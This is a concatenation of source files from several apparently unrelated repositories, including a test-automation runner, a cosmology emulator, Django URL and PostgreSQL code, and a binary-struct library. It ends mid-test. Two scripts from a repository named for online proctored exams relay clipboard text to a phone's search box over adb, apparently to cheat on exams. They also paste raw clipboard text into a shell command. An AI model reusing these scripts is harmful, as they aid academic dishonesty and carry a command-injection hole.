        # Match feature points with a FLANN-based matcher.
        matcher = cv2.FlannBasedMatcher()
        matchePoints = matcher.match(descriptor1, descriptor2)
        # Find the strongest (minimum-distance) match.
        minMatch = 1
        maxMatch = 0
        for i in range(len(matchePoints)):
            if minMatch > matchePoints[i].distance:
                minMatch = matchePoints[i].distance
            if maxMatch < matchePoints[i].distance:
                maxMatch = matchePoints[i].distance
        if minMatch > 0.2:
            # best match too weak -- treat as not found
            return None
        # Collect the best-distance match point(s).
        # NOTE(review): keypoints1 is rebound inside the loop and x/y come
        # from the last successfully processed best match; if every best
        # match raises in the try block, x/y stay unbound and the code
        # below would fail -- TODO confirm this cannot happen in practice.
        DMatch = None
        MatchePoints = []
        for i in range(len(matchePoints)):
            if matchePoints[i].distance == minMatch:
                try:
                    keypoint = keypoints1[matchePoints[i].queryIdx]
                    x, y = keypoint.pt
                    if self.iszoom:
                        # scale 2x screenshot pixels back to view coordinates
                        x = x / 2.0
                        y = y / 2.0
                    keypoints1 = [keypoint]
                    dmatch = matchePoints[i]
                    dmatch.queryIdx = 0
                    MatchePoints.append(dmatch)
                except:
                    continue
        # Draw the best match for the report image.
        outImg = None
        outImg = cv2.drawMatches(self.baseimage, keypoints1, self.matchimage, keypoints2, MatchePoints, outImg, matchColor=(0, 255, 0),
                                 flags=cv2.DRAW_MATCHES_FLAGS_DEFAULT)
        # cv2.imwrite("outimg.png", outImg)
        matchinfo = {
            'x':int(x),
            'y':int(y),
            'ocrimg':outImg
        }
        return matchinfo
|
Hanlen520/fasttest | fasttest/runner/case_analysis.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import sys
import traceback
from fasttest.common import Var
from fasttest.runner.action_analysis import ActionAnalysis
class CaseAnalysis(object):
    """Walks a parsed test case (nested lists/dicts of step strings),
    handles the flow-control constructs (``while`` / ``if`` / ``elif`` /
    ``else`` / ``for`` / ``break``) and feeds individual steps to
    :class:`ActionAnalysis`.  Also implements an interactive debug REPL
    for steps ending in ``--Debug``.
    """
    def __init__(self):
        # NOTE(review): attribute name has a typo ("nalysis"); kept as-is
        # because it is existing internal state.
        self.action_nalysis = ActionAnalysis()
        self.testcase_steps = []
        # None = not yet in debug mode; True/False drive the REPL below
        self.is_run = None
        # saved copy of Var.time_out while a debug one-off command runs
        self.timeout = 10
    def iteration(self, steps, style='', common={}, iterating_var=None):
        '''
        Recursively execute a (possibly nested) list/dict of steps.
        @param steps: list of step strings and/or dicts of nested blocks
        @param style: indentation of each step in the result report
        @param common: parameters supplied by a ``call`` invocation
        @param iterating_var: current ``for`` loop variable mapping
        @return: the string ``'break'`` to propagate a ``break`` upward
        '''
        if isinstance(steps, list):
            for step in steps:
                if isinstance(step, str):
                    self.case_executor(step, style, common, iterating_var)
                    if step.startswith('break'):
                        return 'break'
                elif isinstance(step, dict):
                    result = self.iteration(step, style, common, iterating_var)
                    if result == 'break':
                        return 'break'
        elif isinstance(steps, dict):
            for key, values in steps.items():
                if key.startswith('while'):
                    # re-evaluate the condition before every pass
                    while self.case_executor(key, style, common, iterating_var):
                        result = self.iteration(values, f'{style} ', common, iterating_var)
                        if result == 'break':
                            break
                elif key.startswith('if') or key.startswith('elif') or key.startswith('else'):
                    if self.case_executor(key, style, common, iterating_var):
                        result = self.iteration(values, f'{style} ', common, iterating_var)
                        if result == 'break':
                            return 'break'
                        break  # branch taken -- stop evaluating the if/elif/else chain
                elif re.match('for\s+(\$\{\w+\})\s+in\s+(\S+)', key):
                    parms = self.case_executor(key, style, common, iterating_var)
                    # run the body once per element, binding the loop variable
                    for f in parms['value']:
                        iterating_var = {parms['key']: f}
                        result = self.iteration(values, f'{style} ', common, iterating_var)
                        if result == 'break':
                            break
                else:
                    raise SyntaxError('- {}:'.format(key))
    def case_executor(self, step, style, common, iterating_var):
        """Execute one step, entering an interactive REPL in debug mode.

        REPL commands: ``r`` run this step, ``n`` run and stay stopped,
        ``c`` continue normally, ``q`` quit; any other input is executed
        as an ad-hoc step with a shortened timeout; empty input re-prompts.
        """
        # Var.is_debug is global so that call'd sub-cases inherit debug mode.
        if step.strip().endswith('--Debug') or step.strip().endswith('--debug') or Var.is_debug:
            Var.is_debug = True
            while True:
                try:
                    if self.is_run is False:
                        print(step)
                        out = input('>')
                    elif not (step.strip().endswith('--Debug') or step.strip().endswith('--debug')):
                        # already past the breakpoint step: run normally
                        self.is_run = True
                        result = self.action_nalysis.action_analysis(self.rstrip_step(step), style, common, iterating_var)
                        return result
                    else:
                        print(step)
                        out = input('>')
                    if not len(out):
                        self.is_run = False
                        continue
                    elif out.lower() == 'r':
                        # run
                        self.is_run = True
                        result = self.action_nalysis.action_analysis(self.rstrip_step(step), style, common, iterating_var)
                        return result
                    elif out.lower() == 'c':
                        # continue
                        self.is_run = False
                        break
                    elif out.lower() == 'n':
                        # next
                        self.is_run = False
                        result = self.action_nalysis.action_analysis(self.rstrip_step(step), style, common, iterating_var)
                        return result
                    elif out.lower() == 'q':
                        # quit
                        sys.exit()
                    else:
                        # ad-hoc step typed at the prompt: run it with a short
                        # timeout, then restore the configured one
                        self.is_run = False
                        self.timeout = Var.time_out
                        Var.time_out = 0.5
                        self.action_nalysis.action_analysis(out, style, common, iterating_var)
                        Var.time_out = self.timeout
                        continue
                except Exception as e:
                    # keep the REPL alive on errors; restore the timeout
                    Var.time_out = self.timeout
                    self.is_run = False
                    traceback.print_exc()
                    continue
        else:
            result = self.action_nalysis.action_analysis(step, style, common, iterating_var)
            return result
    def rstrip_step(self, step):
        # Strip a trailing ``--Debug`` / ``--debug`` marker (7 chars) if present.
        if step.strip().endswith('--Debug') or step.strip().endswith('--debug'):
            return step.strip()[:-7].strip()
        return step
tmcclintock/Pmesh_emulator | pmesh_emulator/_data_manipulation.py | <gh_stars>0
"""
This file is for reading in the simulation data and saving it into a convenient format. It should not be used by the user. If you are reading this, then disregard. It will do nothing unless you are running locally (Author is <NAME>) on my laptop.
"""
import numpy as np
Nboxes = 122
Nsnaps = 30
sf = np.linspace(0.02, 1.0, Nsnaps)
scale_factors = [0.0200, 0.0538, 0.0876, 0.1214, 0.1552]
#Input file path
inpath = "pmesh_test/Box_{box:03d}/powerspec-debug_{scale_factor:0.4f}.txt"
k, _, _ = np.loadtxt(inpath.format(box=0, scale_factor=0.02), unpack=True)
#NOTE! the first k value is 0, and p = 0. This breaks the emulator,
#so we will chop that point off.
k = k[1:]
np.save("k", k)
Nk = k.size
#The emulator interpolates whole cosmologies at once
data = np.zeros((Nboxes, Nk*Nsnaps))
print("k shape {kshape}, p shape {pshape}".format(kshape=k.shape,
pshape=data.shape))
for box in range(0, 122):
for i, s in enumerate(sf):
offset = i*Nk
_, p, _ = np.loadtxt(inpath.format(box=box, scale_factor=s), \
unpack=True)
#Chop off the k=0 point (the first point)
p = p[1:]
data[box, offset: offset+Nk] = p
print("Done with Box_{box:03d}".format(box=box))
np.save("pkz_data_Nsim_x_NkNz", data)
|
tmcclintock/Pmesh_emulator | pmesh_emulator/pmesh_emulator.py | import copy
import numpy as np
import george
from george.kernels import ExpSquaredKernel, Matern52Kernel, \
ExpKernel, RationalQuadraticKernel, Matern32Kernel
import scipy.optimize as op
#Assert statements to guarantee the linter doesn't complain
assert ExpSquaredKernel
assert Matern52Kernel
assert ExpKernel
assert Matern32Kernel
assert RationalQuadraticKernel
class _pmesh_emulator(object):
"""
An emulator for particle mesh simulations. The emulator is trained
on a set of input power spectra at given locations in cosmological
parameter space. The power spectra are evaluated over a set of
redshifts and wavenumbers (h/Mpc com.).
Args:
parameters (array-like): locations in parameter space
of the input power spectra.
redshifts (float array-like): list of redshifts.
Can be a single number.
k (array-like): wavenumbers of the input power spectra.
power_spectra (array-like): 2D array of power spectra
evaluated at each location in parameter space.
"""
def __init__(self, parameters, redshifts, k, power_spectra,
number_of_principle_components=6, kernel=None):
parameters = np.asarray(parameters)
redshifts = np.asarray(redshifts)
k = np.asarray(k)
power_spectra = np.asarray(power_spectra)
if parameters.ndim != 2:
raise Exception("Parameters must be 2D array.")
if power_spectra.ndim != 2:
raise Exception("Power spectra must be a 2D array of dimensions "+
"N_parameters x (N_k*N_z).")
if len(parameters) != len(power_spectra):
raise Exception("Power spectra must be a 2D array of dimensions "+
"N_parameters x (N_k*N_z).")
if len(redshifts)*len(k) != len(power_spectra[0]):
raise Exception("Power spectra must be a 2D array of dimensions "+
"N_parameters x (N_k*N_z).")
self.parameters = parameters
self.redshifts = redshifts
self.k = k
self.power_spectra = power_spectra
self.Npars = len(self.parameters[0])
self.NPC = number_of_principle_components
metric_guess = np.std(self.parameters, 0)
if kernel is None:
kernel = 1.*ExpSquaredKernel(metric=metric_guess, ndim=self.Npars)
self.kernel = kernel
def train(self):
"""Train the emulator.
Args:
None
Return:
None
"""
zs = self.redshifts
k = self.k
p = self.power_spectra
k2p = copy.deepcopy(p)
Nk = len(k)
Nz = len(zs)
#Multiply each P(k) by k^2, but note the shapes
#of the power spectra array we have to deal with
for i in range(Nz):
lo = i*Nk
hi = (i+1)*Nk
k2p[:, lo:hi] *= k**2
#Take the log -- this reduces the dynamic range
lnk2p = np.log(k2p)
#Remove the mean and make it unit variance in each k bin
lnk2p_mean = np.mean(lnk2p)
lnk2p_std = np.std(lnk2p, 0)
lnk2p = (lnk2p - lnk2p_mean)/lnk2p_std
#Save what we have now
self.lnk2p = lnk2p
self.lnk2p_mean = lnk2p_mean
self.lnk2p_std = lnk2p_std
#Do SVD to pull out principle components
u,s,v = np.linalg.svd(lnk2p, 0) #Do the PCA
s = np.diag(s)
N = len(s)
P = np.dot(v.T, s)/np.sqrt(N)
Npc = self.NPC #number of principle components
phis = P.T[:Npc]
ws = np.sqrt(N) * u.T[:Npc]
#Save the weights and PCs
self.ws = ws
self.phis = phis
#Create the GPs and save them
gplist = []
for i in range(Npc):
ws = self.ws[i, :]
kern = copy.deepcopy(self.kernel)
gp = george.GP(kernel=kern, fit_kernel=True, mean=np.mean(ws))
gp.compute(self.parameters)
gplist.append(gp)
continue
self.gplist = gplist
#Train the GPs
for i, gp in enumerate(self.gplist):
ws = self.ws[i, :]
def nll(p):
gp.set_parameter_vector(p)
ll = gp.log_likelihood(ws, quiet=True)
return -ll if np.isfinite(ll) else 1e25
def grad_nll(p):
gp.set_parameter_vector(p)
return -gp.grad_log_likelihood(ws, quiet=True)
p0 = gp.get_parameter_vector()
result = op.minimize(nll, p0, jac=grad_nll)
gp.set_parameter_vector(result.x)
continue
self.trained=True
return
def predict(self, params):
"""Predict the power spectrum at a set of cosmological parameters.
Args:
params (float or array-like): parameters of the requested
power spectra
Returns:
(array-like): length (Nz x Nk) 1D array with the predicted
power spectra for the requested cosmology
"""
if not self.trained:
raise Exception("Need to train the emulator first.")
params = np.atleast_1d(params)
if params.ndim > 1:
raise Exception("'params' must be a single point in parameter "+
"space; a 1D array at most.")
if len(params) != self.Npars:
raise Exception("length of 'params' does not match training "+\
"parameters.")
#For higher dimensional trianing data, george requires a 2D array...
if len(params) > 1:
params = np.atleast_2d(params)
#Loop over d GPs and predict weights
wp = np.array([gp.predict(ws, params)[0] for ws, gp in\
zip(self.ws, self.gplist)])
#Multiply by the principle components to get predicted lnk2p
lnk2p_pred = wp[0]*self.phis[0]
for i in range(1, self.NPC):
lnk2p_pred += wp[i]*self.phis[i]
#Multiply on the stddev and add on the mean
lnk2p_pred = lnk2p_pred *self.lnk2p_std + self.lnk2p_mean
k2p_pred = np.exp(lnk2p_pred)
k = self.k
zs = self.redshifts
Nk = len(k)
Nz = len(zs)
P_pred = k2p_pred
#Multiply each P(k) by k^2, but note the shapes
#of the power spectra array we have to deal with
for i in range(Nz):
lo = i*Nk
hi = (i+1)*Nk
P_pred[lo:hi] /= k**2
return P_pred
class pmesh_emulator(object):
    """User-facing emulator: loads the packaged training data from disk and
    wraps a trained :class:`_pmesh_emulator`.

    Args:
        excluded_indices: optional indices of training boxes to hold out
            (useful for leave-one-out validation); held-out data is kept on
            ``excluded_params``/``excluded_pkz``.
        number_of_principle_components (int): PCA components to keep.
    """
    def __init__(self, excluded_indices=None, number_of_principle_components=6):
        import os
        import inspect
        # The data files are packaged alongside this module.
        data_path = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))+"/"
        self.number_of_principle_components = number_of_principle_components
        self.params = np.loadtxt(data_path+"training_points.txt")
        self.sf = np.linspace(0.02, 1.0, 30)  # 30 Snapshots
        self.zs = 1./self.sf - 1.
        self.k = np.load(data_path+"k.npy")
        self.pkz = np.load(data_path+"pkz_data_Nsim_x_NkNz.npy")
        # Sanity-check the packaged data before training on it.
        if np.any(self.pkz <= 0):
            raise Exception("problem: negative or 0 P(k,z)")
        if np.any(np.isnan(self.pkz)):
            raise Exception("problem: nan value in P(k,z)")
        if np.any(np.isinf(self.pkz)):
            raise Exception("problem: inf value in P(k,z)")
        if excluded_indices is not None:
            # Hold out the requested boxes for validation.
            # (An unused `inds = np.arange(len(self.params))` was removed.)
            self.excluded_indices = excluded_indices
            self.excluded_params = self.params[excluded_indices]
            self.excluded_pkz = self.pkz[excluded_indices]
            self.params = np.delete(self.params, excluded_indices, axis=0)
            self.pkz = np.delete(self.pkz, excluded_indices, axis=0)
        self._emu = _pmesh_emulator(self.params, self.zs,
                                    self.k, self.pkz,
                                    number_of_principle_components)
        self._emu.train()

    def predict(self, params):
        """Predict P(k, z); see :meth:`_pmesh_emulator.predict`."""
        return self._emu.predict(params)
if __name__ == "__main__":
emu = pmesh_emulator()
|
tmcclintock/Pmesh_emulator | pmesh_emulator/__init__.py | """Emulator for particle mesh sims.
"""
from .pmesh_emulator import pmesh_emulator
assert pmesh_emulator #A hack to get pyflakes to not complain
__version__ = "0.1.0"
__author__ = "<NAME>"
__email__ = "<EMAIL>"
|
tmcclintock/Pmesh_emulator | setup.py | from setuptools import setup
dist = setup(name="Pmesh_emulator",
author="<NAME>",
author_email="<EMAIL>",
description="Framework for emulating particle mesh simulations.",
license="MIT",
url="https://github.com/tmcclintock/Pmesh_emulator",
include_package_data = True,
packages=['pmesh_emulator'],
long_description=open("README.md").read())
|
akhileshkoti/easypass-online-proctored-exams | automate_search.pyw | <filename>automate_search.pyw
# Clipboard-to-device search bridge (windowed .pyw variant, no console
# output): polls the local clipboard and types any new contents into the
# attached Android device's search box via adb.
from ppadb.client import Client
import clipboard as c
import time

# Connect to the local adb server (default host/port).
client = Client(host="127.0.0.1", port=5037)
'''print("------------Starting Server------------")
print("Connecting to client",end='')
for i in range(3):
    print('.',end='')
    time.sleep(1)'''
devices = client.devices()
# Assumes at least one attached device -- TODO confirm; raises IndexError
# otherwise.
device = devices[0]
#print('Connected\n')
while(True):
    # NOTE(review): the inner loop below never breaks, so this outer loop
    # body -- including the device re-acquisition -- effectively runs once.
    devices = client.devices()
    device = devices[0]
    # print('Connected\n')
    new = text = ''
    while(True):
        # Poll the clipboard; normalize whitespace into '%s', which
        # 'adb shell input text' interprets as spaces.
        text = c.paste()
        text = text.split()
        text = '%s'.join(text)
        if(new != text):
            device.shell('input keyevent 84')  # KEYCODE_SEARCH
            time.sleep(2)  # give the search UI time to open
            device.shell('input text ' + text)
            #print(text)
            device.shell('input keyevent 28')  # KEYCODE_CLEAR
            device.shell('input keyevent 66')  # KEYCODE_ENTER
            new = text
|
akhileshkoti/easypass-online-proctored-exams | automate_android_search.py | <reponame>akhileshkoti/easypass-online-proctored-exams
# Clipboard-to-device search bridge (console variant of automate_search.pyw):
# polls the local clipboard and types any new contents into the attached
# Android device's search box via adb.
from ppadb.client import Client
import clipboard as c
import time

# Connect to the local adb server (default host/port).
client = Client(host="127.0.0.1", port=5037)
print("------------Starting Server------------")
print("Connecting to client", end='')
for i in range(3):
    # Cosmetic "Connecting..." animation.
    print('.', end='')
    time.sleep(1)
devices = client.devices()
# Assumes at least one attached device -- TODO confirm; raises IndexError
# otherwise.
device = devices[0]
print('Connected\n')
new = text = ''
while(True):
    # Poll the clipboard; normalize whitespace into '%s', which
    # 'adb shell input text' interprets as spaces.
    text = c.paste()
    text = text.split()
    text = '%s'.join(text)
    if(new != text):
        device.shell('input keyevent 84')  # KEYCODE_SEARCH
        time.sleep(2)  # give the search UI time to open
        device.shell('input text ' + text)
        print(text)
        device.shell('input keyevent 28')  # KEYCODE_CLEAR
        device.shell('input keyevent 66')  # KEYCODE_ENTER
        new = text
|
maenette/django | tests/postgres_tests/test_signals.py | from django.db import connection
from . import PostgreSQLTestCase
try:
from django.contrib.postgres.signals import get_hstore_oids, get_citext_oids
except ImportError:
pass # pyscogp2 isn't installed.
class OIDTests(PostgreSQLTestCase):
    """Check that the cached hstore/citext OID lookups return sane values
    and are served from the per-alias cache (no extra queries)."""

    def assertOIDs(self, oids):
        """Assert that `oids` is a non-empty tuple of ints."""
        self.assertIsInstance(oids, tuple)
        self.assertGreater(len(oids), 0)
        self.assertTrue(all(isinstance(oid, int) for oid in oids))

    def test_hstore_cache(self):
        # A repeated lookup must be answered from the lru_cache, i.e.
        # without hitting the database.
        with self.assertNumQueries(0):
            get_hstore_oids(connection.alias)

    def test_citext_cache(self):
        # Same cache guarantee for the citext OID lookup.
        with self.assertNumQueries(0):
            get_citext_oids(connection.alias)

    def test_hstore_values(self):
        oids, array_oids = get_hstore_oids(connection.alias)
        self.assertOIDs(oids)
        self.assertOIDs(array_oids)

    def test_citext_values(self):
        oids = get_citext_oids(connection.alias)
        self.assertOIDs(oids)
|
maenette/django | django/urls/conf.py | <filename>django/urls/conf.py<gh_stars>1-10
"""Functions for use in URLsconfs."""
from importlib import import_module
from django.core.exceptions import ImproperlyConfigured
from .resolvers import LocaleRegexURLResolver
def include(arg, namespace=None):
    """Return a 3-tuple ``(urlconf_module, app_name, namespace)`` consumed by
    ``url()`` when building a ``RegexURLResolver``.

    ``arg`` may be a urlconf module, its dotted import path, or a 2-tuple of
    ``(patterns_or_module, app_name)``.

    Raises ImproperlyConfigured for a non-2-tuple, for a namespace override
    on a tuple that already provides one, for a namespace without an
    app_name, and for nested ``i18n_patterns``.
    """
    app_name = None
    if isinstance(arg, tuple):
        # Callable returning a namespace hint.
        try:
            urlconf_module, app_name = arg
        except ValueError:
            if namespace:
                raise ImproperlyConfigured(
                    'Cannot override the namespace for a dynamic module that '
                    'provides a namespace.'
                )
            raise ImproperlyConfigured(
                'Passing a %d-tuple to include() is not supported. Pass a '
                '2-tuple containing the list of patterns and app_name, and '
                'provide the namespace argument to include() instead.' % len(arg)
            )
    else:
        # No namespace hint - use manually provided namespace.
        urlconf_module = arg

    if isinstance(urlconf_module, str):
        # A dotted path was given: import the module lazily here.
        urlconf_module = import_module(urlconf_module)
    patterns = getattr(urlconf_module, 'urlpatterns', urlconf_module)
    # The module-level app_name attribute wins over a tuple-provided one.
    app_name = getattr(urlconf_module, 'app_name', app_name)
    if namespace and not app_name:
        raise ImproperlyConfigured(
            'Specifying a namespace in include() without providing an app_name '
            'is not supported. Set the app_name attribute in the included '
            'module, or pass a 2-tuple containing the list of patterns and '
            'app_name instead.',
        )

    namespace = namespace or app_name

    # Make sure the patterns can be iterated through (without this, some
    # testcases will break).
    if isinstance(patterns, (list, tuple)):
        for url_pattern in patterns:
            if isinstance(url_pattern, LocaleRegexURLResolver):
                raise ImproperlyConfigured(
                    'Using i18n_patterns in an included URLconf is not allowed.'
                )
    return (urlconf_module, app_name, namespace)
|
maenette/django | django/conf/urls/__init__.py | <reponame>maenette/django<gh_stars>1-10
from django.urls import RegexURLPattern, RegexURLResolver, include
from django.views import defaults
__all__ = ['handler400', 'handler403', 'handler404', 'handler500', 'include', 'url']
handler400 = defaults.bad_request
handler403 = defaults.permission_denied
handler404 = defaults.page_not_found
handler500 = defaults.server_error
def url(regex, view, kwargs=None, name=None):
    """Return a URL pattern for `view`, or a URL resolver when `view` is the
    3-tuple produced by include().

    Raises TypeError for anything that is neither callable nor a
    list/tuple.
    """
    if isinstance(view, (list, tuple)):
        # For include(...) processing.
        urlconf_module, app_name, namespace = view
        resolver = RegexURLResolver(regex, urlconf_module, kwargs,
                                    app_name=app_name, namespace=namespace)
        return resolver
    if callable(view):
        return RegexURLPattern(regex, view, kwargs, name)
    raise TypeError('view must be a callable or a list/tuple in the case of include().')
|
maenette/django | django/contrib/postgres/signals.py | import functools
import psycopg2
from psycopg2 import ProgrammingError
from psycopg2.extras import register_hstore
from django.db import connections
@functools.lru_cache()
def get_hstore_oids(connection_alias):
    """Return hstore and hstore array OIDs."""
    with connections[connection_alias].cursor() as cursor:
        cursor.execute(
            "SELECT t.oid, typarray "
            "FROM pg_type t "
            "JOIN pg_namespace ns ON typnamespace = ns.oid "
            "WHERE typname = 'hstore'"
        )
        rows = cursor.fetchall()
    # One (oid, array_oid) pair per schema that has the hstore type.
    return tuple(row[0] for row in rows), tuple(row[1] for row in rows)
@functools.lru_cache()
def get_citext_oids(connection_alias):
    """Return citext array OIDs."""
    with connections[connection_alias].cursor() as cursor:
        cursor.execute("SELECT typarray FROM pg_type WHERE typname = 'citext'")
        rows = cursor.fetchall()
    return tuple(row[0] for row in rows)
def register_type_handlers(connection, **kwargs):
    """Register psycopg2 type adapters for hstore and citext on `connection`.

    NOTE(review): the (connection, **kwargs) signature matches Django's
    signal-receiver convention -- presumably wired to connection_created;
    confirm at the caller.
    """
    if connection.vendor != 'postgresql':
        return

    try:
        oids, array_oids = get_hstore_oids(connection.alias)
        register_hstore(connection.connection, globally=True, oid=oids, array_oid=array_oids)
    except ProgrammingError:
        # Hstore is not available on the database.
        #
        # If someone tries to create an hstore field it will error there.
        # This is necessary as someone may be using PSQL without extensions
        # installed but be using other features of contrib.postgres.
        #
        # This is also needed in order to create the connection in order to
        # install the hstore extension.
        pass

    try:
        citext_oids = get_citext_oids(connection.alias)
        array_type = psycopg2.extensions.new_array_type(citext_oids, 'citext[]', psycopg2.STRING)
        psycopg2.extensions.register_type(array_type, None)
    except ProgrammingError:
        # citext is not available on the database.
        #
        # The same comments in the except block of the above call to
        # register_hstore() also apply here.
        pass
|
sprout42/StarStruct | starstruct/elementescaped.py | <reponame>sprout42/StarStruct<filename>starstruct/elementescaped.py
"""
The escaped NamedStruct element class.
Can be used in multiple ways ways:
1: Variable Lengths, in terms of namedstruct elements
.. code-block:: python
ExampleMessage = Message('VarTest', [('x', 'B'), ('y', 'B')])
TestStruct = Message('TestStruct', [
('escaped_data', ExampleMessage, {
'escape': {
'start': b'\xff\x00\xff\x11',
'separator': b'\x12\x34',
'end': b'\x11\xff\x00\xff',
},
}),
])
`start` is the starting escape sequence
`separator` is a separating sequence
`end` is the ending escape sequence
"""
# pylint: disable=line-too-long
from typing import Optional
import starstruct
from starstruct.element import register, Element
from starstruct.modes import Mode
class Escapor:
    """Container for the escape byte sequences used by ElementEscaped.

    Each of `start`, `separator`, and `end` reads back as an empty byte
    string when it was not supplied.
    """

    def __init__(self, start=None, separator=None, end=None, opts=None):
        self._start = start
        self._separator = separator
        self._end = end
        self._opts = opts

    @property
    def start(self):
        """Starting escape sequence (b'' when unset)."""
        return b'' if self._start is None else self._start

    @property
    def separator(self):
        """Separator between packed items (b'' when unset)."""
        return b'' if self._separator is None else self._separator

    @property
    def end(self):
        """Ending escape sequence (b'' when unset)."""
        return b'' if self._end is None else self._end
@register
class ElementEscaped(Element):
    """
    A StarStruct element holding a list of sub-messages framed by escape
    sequences.  The packed form is:
    ``start`` + (packed item + ``separator``) for each item + ``end``.

    :param field: The fields passed into the constructor of the element
    :param mode: The mode in which to pack the bytes
    :param alignment: Number of bytes to align to
    """
    def __init__(self, field: list, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
        # All of the type checks have already been performed by the class
        # factory
        self.name = field[0]

        # Escaped elements don't use the normal struct format, the format is
        # a StarStruct.Message object, but change the mode to match the
        # current mode.
        self.format = field[1]
        self.escapor = Escapor(**field[2]['escape'])

        self._mode = mode
        self._alignment = alignment
        self.update(mode, alignment)

    @staticmethod
    def valid(field: tuple) -> bool:
        """
        See :py:func:`starstruct.element.Element.valid`

        :param field: The items to determine the structure of the element
        """
        # Requires (name, Message, {'escape': {...}}).
        if len(field) == 3:
            return isinstance(field[1], starstruct.message.Message) \
                and isinstance(field[2], dict) \
                and 'escape' in field[2].keys()
        else:
            return False

    def validate(self, msg):
        """
        Ensure that the supplied message contains the required information for
        this element object to operate.

        All elements that are Variable must reference valid Length elements.
        """
        # TODO: Any validation needed here?
        pass

    def update(self, mode=None, alignment=None):
        """change the mode of the struct format"""
        # NOTE(review): these guards test the *current* attributes, not the
        # incoming arguments, so update() with default None args would wipe
        # mode/alignment -- confirm intended (cf. ElementNum.update).
        if self._mode is not None:
            self._mode = mode
        if self._alignment is not None:
            self._alignment = alignment

        self.format.update(self._mode, self._alignment)

    def pack(self, msg):
        """Pack the provided values into the supplied buffer."""
        # When packing use the length of the current element to determine
        # how many elements to pack, not the length element of the message
        # (which should not be specified manually).
        iterator = msg[self.name]
        # A bare (non-list) item is packed as a one-element list.
        if not isinstance(iterator, list):
            iterator = [iterator]
        ret = self.escapor.start
        for item in iterator:
            ret += self.format.pack(item)
            ret += self.escapor.separator
        ret += self.escapor.end

        # There is no need to make sure that the packed data is properly
        # aligned, because that should already be done by the individual
        # messages that have been packed.
        return ret

    def unpack(self, msg, buf):
        """Unpack data from the supplied buffer using the initialized format."""
        # `msg` is unused here but kept for the common Element interface.
        ret = []

        # Check the starting value
        if buf[:len(self.escapor.start)] == self.escapor.start:
            buf = buf[len(self.escapor.start):]
        else:
            raise ValueError('Buf did not start with expected start sequence: {0}'.format(
                self.escapor.start.decode()))

        unused = buf
        while True:
            (val, unused) = self.format.unpack_partial(unused)
            ret.append(val)
            # Each item must be followed by the separator sequence.
            if unused[:len(self.escapor.separator)] == self.escapor.separator:
                unused = unused[len(self.escapor.separator):]
            else:
                raise ValueError('Buf did not separate with expected separate sequence: {0}'.format(
                    self.escapor.separator.decode()))
            # NOTE(review): with an empty `end` sequence this check matches
            # immediately, so only one item would ever be unpacked -- confirm.
            if unused[:len(self.escapor.end)] == self.escapor.end:
                unused = unused[len(self.escapor.end):]
                break

        # There is no need to make sure that the unpacked data consumes a
        # properly aligned number of bytes because that should already be done
        # by the individual messages that have been unpacked.
        return (ret, unused)

    def make(self, msg):
        """Return the expected "made" value"""
        # NOTE(review): unlike pack(), this assumes msg[self.name] is always
        # a list -- a bare item is not wrapped here.
        ret = []
        for val in msg[self.name]:
            ret.append(self.format.make(val))
        return ret
|
sprout42/StarStruct | starstruct/tests/__init__.py | """Tests for the `starstruct` package."""
|
sprout42/StarStruct | starstruct/tests/test_message.py | #!/usr/bin/env python3
"""Tests for the starstruct class"""
import enum
import unittest
import pytest
from starstruct.message import Message
from starstruct.modes import Mode
# Used as the validated 'type' field and as the discriminator for the
# 'data' union in TestStarStruct.teststruct below.
class SimpleEnum(enum.Enum):
    """Simple enum class for testing message pack/unpack"""
    one = 1
    two = 2
    three = 3
# pylint: disable=line-too-long,invalid-name
class TestStarStruct(unittest.TestCase):
    """StarStruct module tests"""

    # Message layout exercising every element flavor: padding, strings,
    # an enum-validated field, a length-prefixed variable field, and a
    # type-discriminated union.
    teststruct = [
        ('a', 'b'),                 # signed byte: -128, 127
        ('pad1', '3x'),             # 3 pad bytes
        ('b', 'H'),                 # unsigned short: 0, 65535
        ('pad2', 'x'),              # 1 pad byte
        ('c', '10s'),               # 10 byte string
        ('d', 'x'),                 # 1 pad byte
        ('e', '2H'),                # 4 unsigned bytes: 0, 2^32-1
        ('type', 'B', SimpleEnum),  # unsigned byte, enum validated
        ('length', 'H', 'vardata'), # unsigned short length field
        ('vardata',                 # variable length data
         Message('VarTest', [('x', 'B'), ('y', 'B')]),
         'length'),
        ('data', {                  # discriminated data
            SimpleEnum.one: Message('Struct1', [('y', 'B'), ('pad', '3x'), ('z', 'i')]),
            SimpleEnum.two: Message('Struct2', [('z', '20s')]),
            SimpleEnum.three: Message('Struct3', []),
        }, 'type'),
    ]

    # Input dicts for pack(); index-aligned with testbytes below.
    testvalues = [
        {
            'a': -128,
            'b': 0,
            'c': '0123456789',
            'e': 0,
            'type': SimpleEnum.one,
            'length': 0,
            'vardata': [],
            'data': {
                'y': 50,
                'z': 0x5577AACC,
            },
        },
        {
            'a': 127,
            'b': 65535,
            'c': 'abcdefghij',
            'e': 0xFFFFFFFF,
            'type': SimpleEnum.two,
            'length': 2,
            'vardata': [
                {'x': 1, 'y': 2},
                {'x': 3, 'y': 4},
            ],
            'data': {
                'z': '0123456789abcdefghij',
            },
        },
        {
            'a': -1,
            'b': 32767,
            'c': '\n\tzyx',
            'e': 0x7FFFFFFF,
            'type': SimpleEnum.three,
            'length': 1,
            'vardata': [
                {'x': 255, 'y': 127},
            ],
            'data': {},
        },
        {
            'a': 100,
            'b': 100,
            'c': 'a0b1c2d3e4',
            'e': 10000,
            'type': SimpleEnum.one,
            'length': 10,
            'vardata': [
                {'x': 255, 'y': 127},
                {'x': 254, 'y': 128},
                {'x': 253, 'y': 129},
                {'x': 252, 'y': 130},
                {'x': 251, 'y': 131},
                {'x': 250, 'y': 132},
                {'x': 249, 'y': 133},
                {'x': 248, 'y': 134},
                {'x': 247, 'y': 135},
                {'x': 246, 'y': 136},
            ],
            'data': {
                'y': 100,
                'z': 2000,
            },
        },
    ]

    # Expected packed bytes for each entry of testvalues, per byte order.
    testbytes = {
        'little': [
            b'\x80\x00\x00\x00\x00\x00\x00\x30\x31' +
            b'\x32\x33\x34\x35\x36\x37\x38\x39\x00' +
            b'\x00\x00\x00\x00\x01\x00\x00\x32\x00\x00\x00\xCC\xAA\x77\x55',
            b'\x7F\x00\x00\x00\xFF\xFF\x00\x61\x62' +
            b'\x63\x64\x65\x66\x67\x68\x69\x6A\x00' +
            b'\xFF\xFF\xFF\xFF\x02\x02\x00\x01\x02' +
